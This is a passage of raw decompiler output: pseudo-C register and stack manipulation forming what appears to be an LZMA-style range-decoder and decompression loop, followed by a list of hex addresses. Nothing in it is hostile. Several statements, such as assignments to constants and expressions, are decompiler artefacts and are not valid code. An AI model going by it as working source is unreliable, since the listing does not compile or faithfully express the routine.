                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  												__al = __al & 0x000000fd;
                                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                                  												__eflags = __eax;
                                                                  												 *(__ebp - 0x58) = __eax;
                                                                  												goto L69;
                                                                  											}
                                                                  											L67:
                                                                  											__eax =  *(__ebp - 4);
                                                                  											__ecx =  *(__ebp - 0x38);
                                                                  											 *(__ebp - 0x84) = 8;
                                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                  											goto L132;
                                                                  										case 8:
                                                                  											L70:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x84) = 0xa;
                                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x38);
                                                                  												__ecx =  *(__ebp - 4);
                                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                                  												 *(__ebp - 0x84) = 9;
                                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                  											}
                                                                  											goto L132;
                                                                  										case 9:
                                                                  											L73:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												goto L90;
                                                                  											}
                                                                  											L74:
                                                                  											__eflags =  *(__ebp - 0x60);
                                                                  											if( *(__ebp - 0x60) == 0) {
                                                                  												goto L171;
                                                                  											}
                                                                  											L75:
                                                                  											__eax = 0;
                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  											__eflags = _t259;
                                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                  											goto L76;
                                                                  										case 0xa:
                                                                  											L82:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												L84:
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x84) = 0xb;
                                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                  												goto L132;
                                                                  											}
                                                                  											L83:
                                                                  											__eax =  *(__ebp - 0x28);
                                                                  											goto L89;
                                                                  										case 0xb:
                                                                  											L85:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												__ecx =  *(__ebp - 0x24);
                                                                  												__eax =  *(__ebp - 0x20);
                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  											} else {
                                                                  												__eax =  *(__ebp - 0x24);
                                                                  											}
                                                                  											__ecx =  *(__ebp - 0x28);
                                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  											L89:
                                                                  											__ecx =  *(__ebp - 0x2c);
                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  											L90:
                                                                  											__eax =  *(__ebp - 4);
                                                                  											 *(__ebp - 0x80) = 0x15;
                                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                  											goto L69;
                                                                  										case 0xc:
                                                                  											L99:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												L164:
                                                                  												 *(__ebp - 0x88) = 0xc;
                                                                  												goto L170;
                                                                  											}
                                                                  											L100:
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t334 = __ebp - 0x70;
                                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t334;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											__eax =  *(__ebp - 0x2c);
                                                                  											goto L101;
                                                                  										case 0xd:
                                                                  											L37:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												L159:
                                                                  												 *(__ebp - 0x88) = 0xd;
                                                                  												goto L170;
                                                                  											}
                                                                  											L38:
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t122 = __ebp - 0x70;
                                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t122;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L39:
                                                                  											__eax =  *(__ebp - 0x40);
                                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  												goto L48;
                                                                  											}
                                                                  											L40:
                                                                  											__eflags = __ebx - 0x100;
                                                                  											if(__ebx >= 0x100) {
                                                                  												goto L54;
                                                                  											}
                                                                  											L41:
                                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  											 *(__ebp - 0x48) = __eax;
                                                                  											__eax = __eax + 1;
                                                                  											__eax = __eax << 8;
                                                                  											__eax = __eax + __ebx;
                                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  											__ax =  *__esi;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__edx = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												 *(__ebp - 0x40) = 1;
                                                                  												__cx = __ax >> 5;
                                                                  												__eflags = __eax;
                                                                  												__ebx = __ebx + __ebx + 1;
                                                                  												 *__esi = __ax;
                                                                  											} else {
                                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edx;
                                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L39;
                                                                  											} else {
                                                                  												L45:
                                                                  												goto L37;
                                                                  											}
                                                                  										case 0xe:
                                                                  											L46:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												L160:
                                                                  												 *(__ebp - 0x88) = 0xe;
                                                                  												goto L170;
                                                                  											}
                                                                  											L47:
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t156 = __ebp - 0x70;
                                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t156;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											while(1) {
                                                                  												L48:
                                                                  												__eflags = __ebx - 0x100;
                                                                  												if(__ebx >= 0x100) {
                                                                  													break;
                                                                  												}
                                                                  												L49:
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												__edx = __ebx + __ebx;
                                                                  												__ecx =  *(__ebp - 0x10);
                                                                  												__esi = __edx + __eax;
                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  												__ax =  *__esi;
                                                                  												 *(__ebp - 0x54) = __esi;
                                                                  												__edi = __ax & 0x0000ffff;
                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  													__cx = __ax;
                                                                  													_t170 = __edx + 1; // 0x1
                                                                  													__ebx = _t170;
                                                                  													__cx = __ax >> 5;
                                                                  													__eflags = __eax;
                                                                  													 *__esi = __ax;
                                                                  												} else {
                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                  													0x800 = 0x800 - __edi;
                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  													__ebx = __ebx + __ebx;
                                                                  													 *__esi = __cx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													continue;
                                                                  												} else {
                                                                  													L53:
                                                                  													goto L46;
                                                                  												}
                                                                  											}
                                                                  											L54:
                                                                  											_t173 = __ebp - 0x34;
                                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                  											__eflags =  *_t173;
                                                                  											goto L55;
                                                                  										case 0xf:
                                                                  											L58:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												L161:
                                                                  												 *(__ebp - 0x88) = 0xf;
                                                                  												goto L170;
                                                                  											}
                                                                  											L59:
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t203 = __ebp - 0x70;
                                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t203;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											L60:
                                                                  											__eflags = __ebx - 0x100;
                                                                  											if(__ebx >= 0x100) {
                                                                  												L55:
                                                                  												__al =  *(__ebp - 0x44);
                                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                  												goto L56;
                                                                  											}
                                                                  											L61:
                                                                  											__eax =  *(__ebp - 0x58);
                                                                  											__edx = __ebx + __ebx;
                                                                  											__ecx =  *(__ebp - 0x10);
                                                                  											__esi = __edx + __eax;
                                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  											__ax =  *__esi;
                                                                  											 *(__ebp - 0x54) = __esi;
                                                                  											__edi = __ax & 0x0000ffff;
                                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  												__cx = __ax;
                                                                  												_t217 = __edx + 1; // 0x1
                                                                  												__ebx = _t217;
                                                                  												__cx = __ax >> 5;
                                                                  												__eflags = __eax;
                                                                  												 *__esi = __ax;
                                                                  											} else {
                                                                  												 *(__ebp - 0x10) = __ecx;
                                                                  												0x800 = 0x800 - __edi;
                                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *__esi = __cx;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  											 *(__ebp - 0x44) = __ebx;
                                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  												goto L60;
                                                                  											} else {
                                                                  												L65:
                                                                  												goto L58;
                                                                  											}
                                                                  										case 0x10:
                                                                  											L109:
                                                                  											__eflags =  *(__ebp - 0x6c);
                                                                  											if( *(__ebp - 0x6c) == 0) {
                                                                  												L165:
                                                                  												 *(__ebp - 0x88) = 0x10;
                                                                  												goto L170;
                                                                  											}
                                                                  											L110:
                                                                  											__ecx =  *(__ebp - 0x70);
                                                                  											__eax =  *(__ebp - 0xc);
                                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											_t365 = __ebp - 0x70;
                                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                  											__eflags =  *_t365;
                                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  											goto L111;
                                                                  										case 0x11:
                                                                  											L69:
                                                                  											__esi =  *(__ebp - 0x58);
                                                                  											 *(__ebp - 0x84) = 0x12;
                                                                  											goto L132;
                                                                  										case 0x12:
                                                                  											L128:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												L131:
                                                                  												__eax =  *(__ebp - 0x58);
                                                                  												 *(__ebp - 0x84) = 0x13;
                                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                                  												L132:
                                                                  												 *(_t644 - 0x54) = _t642;
                                                                  												goto L133;
                                                                  											}
                                                                  											L129:
                                                                  											__eax =  *(__ebp - 0x4c);
                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                  											__eflags = __eax;
                                                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                  											goto L130;
                                                                  										case 0x13:
                                                                  											L141:
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												L143:
                                                                  												_t469 = __ebp - 0x58;
                                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                  												__eflags =  *_t469;
                                                                  												 *(__ebp - 0x30) = 0x10;
                                                                  												 *(__ebp - 0x40) = 8;
                                                                  												L144:
                                                                  												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                  												L145:
                                                                  												 *(_t644 - 0x50) = 1;
                                                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                  												goto L149;
                                                                  											}
                                                                  											L142:
                                                                  											__eax =  *(__ebp - 0x4c);
                                                                  											__ecx =  *(__ebp - 0x58);
                                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                                  											 *(__ebp - 0x30) = 8;
                                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                  											L130:
                                                                  											 *(__ebp - 0x58) = __eax;
                                                                  											 *(__ebp - 0x40) = 3;
                                                                  											goto L144;
                                                                  										case 0x14:
                                                                  											L156:
                                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                  											__eax =  *(__ebp - 0x80);
                                                                  											while(1) {
                                                                  												L140:
                                                                  												 *(_t644 - 0x88) = _t537;
                                                                  												goto L1;
                                                                  											}
                                                                  										case 0x15:
                                                                  											L91:
                                                                  											__eax = 0;
                                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  											__al = __al & 0x000000fd;
                                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                  											goto L120;
                                                                  										case 0x16:
                                                                  											goto L0;
                                                                  										case 0x17:
                                                                  											while(1) {
                                                                  												L145:
                                                                  												 *(_t644 - 0x50) = 1;
                                                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                  												goto L149;
                                                                  											}
                                                                  										case 0x18:
                                                                  											goto L146;
                                                                  										case 0x19:
                                                                  											L94:
                                                                  											__eflags = __ebx - 4;
                                                                  											if(__ebx < 4) {
                                                                  												L98:
                                                                  												 *(__ebp - 0x2c) = __ebx;
                                                                  												L119:
                                                                  												_t393 = __ebp - 0x2c;
                                                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                  												__eflags =  *_t393;
                                                                  												L120:
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												__eflags = __eax;
                                                                  												if(__eax == 0) {
                                                                  													L166:
                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                  													goto L170;
                                                                  												}
                                                                  												L121:
                                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                                  													goto L171;
                                                                  												}
                                                                  												L122:
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                  												__eax =  *(__ebp - 0x30);
                                                                  												_t400 = __ebp - 0x60;
                                                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                  												__eflags =  *_t400;
                                                                  												goto L123;
                                                                  											}
                                                                  											L95:
                                                                  											__ecx = __ebx;
                                                                  											__eax = __ebx;
                                                                  											__ecx = __ebx >> 1;
                                                                  											__eax = __ebx & 0x00000001;
                                                                  											__ecx = (__ebx >> 1) - 1;
                                                                  											__al = __al | 0x00000002;
                                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                                  											__eflags = __ebx - 0xe;
                                                                  											 *(__ebp - 0x2c) = __eax;
                                                                  											if(__ebx >= 0xe) {
                                                                  												L97:
                                                                  												__ebx = 0;
                                                                  												 *(__ebp - 0x48) = __ecx;
                                                                  												L102:
                                                                  												__eflags =  *(__ebp - 0x48);
                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                  													L107:
                                                                  													__eax = __eax + __ebx;
                                                                  													 *(__ebp - 0x40) = 4;
                                                                  													 *(__ebp - 0x2c) = __eax;
                                                                  													__eax =  *(__ebp - 4);
                                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                                  													__eflags = __eax;
                                                                  													L108:
                                                                  													__ebx = 0;
                                                                  													 *(__ebp - 0x58) = __eax;
                                                                  													 *(__ebp - 0x50) = 1;
                                                                  													 *(__ebp - 0x44) = 0;
                                                                  													 *(__ebp - 0x48) = 0;
                                                                  													L112:
                                                                  													__eax =  *(__ebp - 0x40);
                                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                  														L118:
                                                                  														_t391 = __ebp - 0x2c;
                                                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                  														__eflags =  *_t391;
                                                                  														goto L119;
                                                                  													}
                                                                  													L113:
                                                                  													__eax =  *(__ebp - 0x50);
                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  													__eax =  *(__ebp - 0x58);
                                                                  													__esi = __edi + __eax;
                                                                  													 *(__ebp - 0x54) = __esi;
                                                                  													__ax =  *__esi;
                                                                  													__ecx = __ax & 0x0000ffff;
                                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                                  														__ecx = 0;
                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                  														__ecx = 1;
                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                  														__ebx = 1;
                                                                  														__ecx =  *(__ebp - 0x48);
                                                                  														__ebx = 1 << __cl;
                                                                  														__ecx = 1 << __cl;
                                                                  														__ebx =  *(__ebp - 0x44);
                                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                  														__cx = __ax;
                                                                  														__cx = __ax >> 5;
                                                                  														__eax = __eax - __ecx;
                                                                  														__edi = __edi + 1;
                                                                  														__eflags = __edi;
                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                  														 *__esi = __ax;
                                                                  														 *(__ebp - 0x50) = __edi;
                                                                  													} else {
                                                                  														 *(__ebp - 0x10) = __edx;
                                                                  														0x800 = 0x800 - __ecx;
                                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  														 *__esi = __dx;
                                                                  													}
                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  														L111:
                                                                  														_t368 = __ebp - 0x48;
                                                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                  														__eflags =  *_t368;
                                                                  														goto L112;
                                                                  													} else {
                                                                  														L117:
                                                                  														goto L109;
                                                                  													}
                                                                  												}
                                                                  												L103:
                                                                  												__ecx =  *(__ebp - 0xc);
                                                                  												__ebx = __ebx + __ebx;
                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                  													__ecx =  *(__ebp - 0x10);
                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  													__ebx = __ebx | 0x00000001;
                                                                  													__eflags = __ebx;
                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                  												}
                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  													L101:
                                                                  													_t338 = __ebp - 0x48;
                                                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                  													__eflags =  *_t338;
                                                                  													goto L102;
                                                                  												} else {
                                                                  													L106:
                                                                  													goto L99;
                                                                  												}
                                                                  											}
                                                                  											L96:
                                                                  											__edx =  *(__ebp - 4);
                                                                  											__eax = __eax - __ebx;
                                                                  											 *(__ebp - 0x40) = __ecx;
                                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                  											goto L108;
                                                                  										case 0x1a:
                                                                  											L56:
                                                                  											__eflags =  *(__ebp - 0x64);
                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                  												L162:
                                                                  												 *(__ebp - 0x88) = 0x1a;
                                                                  												goto L170;
                                                                  											}
                                                                  											L57:
                                                                  											__ecx =  *(__ebp - 0x68);
                                                                  											__al =  *(__ebp - 0x5c);
                                                                  											__edx =  *(__ebp - 8);
                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  											 *( *(__ebp - 0x68)) = __al;
                                                                  											__ecx =  *(__ebp - 0x14);
                                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                  											__eax = __ecx + 1;
                                                                  											__edx = 0;
                                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                  											__edx = _t192;
                                                                  											goto L80;
                                                                  										case 0x1b:
                                                                  											L76:
                                                                  											__eflags =  *(__ebp - 0x64);
                                                                  											if( *(__ebp - 0x64) == 0) {
                                                                  												L163:
                                                                  												 *(__ebp - 0x88) = 0x1b;
                                                                  												goto L170;
                                                                  											}
                                                                  											L77:
                                                                  											__eax =  *(__ebp - 0x14);
                                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                                  												__eflags = __eax;
                                                                  											}
                                                                  											__edx =  *(__ebp - 8);
                                                                  											__cl =  *(__eax + __edx);
                                                                  											__eax =  *(__ebp - 0x14);
                                                                  											 *(__ebp - 0x5c) = __cl;
                                                                  											 *(__eax + __edx) = __cl;
                                                                  											__eax = __eax + 1;
                                                                  											__edx = 0;
                                                                  											_t275 = __eax %  *(__ebp - 0x74);
                                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                                  											__edx = _t275;
                                                                  											__eax =  *(__ebp - 0x68);
                                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  											_t284 = __ebp - 0x64;
                                                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                  											__eflags =  *_t284;
                                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                                  											L80:
                                                                  											 *(__ebp - 0x14) = __edx;
                                                                  											goto L81;
                                                                  										case 0x1c:
                                                                  											while(1) {
                                                                  												L123:
                                                                  												__eflags =  *(__ebp - 0x64);
                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                  													break;
                                                                  												}
                                                                  												L124:
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                  													__eflags = __eax;
                                                                  												}
                                                                  												__edx =  *(__ebp - 8);
                                                                  												__cl =  *(__eax + __edx);
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                  												 *(__eax + __edx) = __cl;
                                                                  												__eax = __eax + 1;
                                                                  												__edx = 0;
                                                                  												_t414 = __eax %  *(__ebp - 0x74);
                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                  												__edx = _t414;
                                                                  												__eax =  *(__ebp - 0x68);
                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                  												__eflags =  *(__ebp - 0x30);
                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                  												 *(__ebp - 0x14) = _t414;
                                                                  												if( *(__ebp - 0x30) > 0) {
                                                                  													continue;
                                                                  												} else {
                                                                  													L127:
                                                                  													L81:
                                                                  													 *(__ebp - 0x88) = 2;
                                                                  													goto L1;
                                                                  												}
                                                                  											}
                                                                  											L167:
                                                                  											 *(__ebp - 0x88) = 0x1c;
                                                                  											goto L170;
                                                                  									}
                                                                  								}
                                                                  								L171:
                                                                  								_t539 = _t538 | 0xffffffff;
                                                                  								goto L172;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  			}















                                                                  0x00406768
                                                                  0x00406768
                                                                  0x00406768
                                                                  0x00406768
                                                                  0x0040676e
                                                                  0x00406772
                                                                  0x00406776
                                                                  0x00406780
                                                                  0x0040678e
                                                                  0x00406a64
                                                                  0x00406a64
                                                                  0x00406a67
                                                                  0x00406a6e
                                                                  0x00406a9b
                                                                  0x00406a9b
                                                                  0x00406a9f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406aa1
                                                                  0x00406aaa
                                                                  0x00406ab0
